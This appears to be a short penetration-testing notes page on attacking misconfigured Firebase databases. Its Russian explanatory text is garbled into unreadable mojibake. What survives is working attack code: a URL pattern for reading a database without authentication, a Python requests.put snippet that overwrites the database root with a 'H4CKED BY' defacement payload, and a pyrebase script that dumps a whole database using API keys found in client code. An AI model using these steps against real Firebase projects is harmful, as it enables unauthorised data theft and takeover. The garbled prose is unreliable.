Firebase
ΠΡΠ»ΠΈ ΠΊΡΠ°ΡΠΊΠΎ
ΠΡΠΎΠ±ΡΠ΅ΠΌ
https://<databasename>.firebaseio.com/.jsonΠΡΡΠ³ΠΎΠΉ ΠΏΡΠΈΠΌΠ΅Ρ
import requests
data= {"Exploit":"Successfull", "H4CKED BY": "zfr"}
reponse = requests.put("https://my-proj.firebaseio.com/.json", json=data)ΠΡΠ»ΠΈ ΠΏΠΎΡΠΎΠΌ ΡΠ΅ΡΠ΅Π· Get ΡΠΌΠΎΠΆΠ΅ΠΌ Π·Π°ΠΏΡΠΎΡΠΈΡΡ β ΡΡΠ·Π²ΠΈΠΌΠΎ: https://hackerone.com/reports/1065134
Firebase Database Takeover
ΠΡΠΈΠΌΠ΅Ρ ΠΏΠ΅Π½ΡΠ΅ΡΡΠ° Ρ ΠΏΠ»ΠΎΡ ΠΎ ΡΠΊΠΎΠ½ΡΠΈΠ³ΡΡΠΈΡΠΎΠ²Π°Π½Π½ΠΎΠΉ Π±Π°Π·ΠΎΠΉ - https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1
ΠΡΠΈΠΌΠ΅Ρ ΠΏΠΎΠΈΡΠΊΠ° ΠΈ ΡΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΠΈ ΠΊΠ»ΡΡΠ΅ΠΉ Firebase
1 ΠΡΠ΅ΠΌ ΠΏΠΎ ΠΊΠΎΠ΄Ρ ΠΏΠΎΠ΄ΠΎΠ±Π½ΡΠ΅ ΠΊΠΎΠ½ΡΡΠ°Π½ΡΡ:
ΠΡΠΈΠΌΠ΅Ρ ΡΠ°Π±ΠΎΡΡ Ρ firebase Π±Π°Π·ΠΎΠΉ Ρ ΠΏΠΎΠΌΠΎΡΡΡ pip install pyrebase
import pyrebase
config = {
"apiKey": "FIREBASE_API_KEY",
"authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
"databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
"storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}
firebase = pyrebase.initialize_app(config)
db = firebase.database()
print(db.get())
ΠΡΠΎΡ ΠΊΠΎΠ΄ ΠΎΡΡΠ°Π±ΠΎΡΠ°Π΅Ρ, Π΅ΡΠ»ΠΈ Π²ΡΡΡΠ°Π²Π»Π΅Π½Ρ permissions Π½Π° ΡΡΠ΅Π½ΠΈΠ΅ Π΄Π»Ρ apiKey
Π Π΄ΠΎΠΊΡΠΌΠ΅Π½ΡΠ°ΡΠΈΠΈ pyrebase ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡΠΈ Π΄ΡΡΠ³ΠΈΠ΅ ΠΏΡΠΈΠΌΠ΅ΡΡ ΠΏΠΎ ΡΠ°Π±ΠΎΡΠ΅ Ρ Firebase.
Last updated
Was this helpful?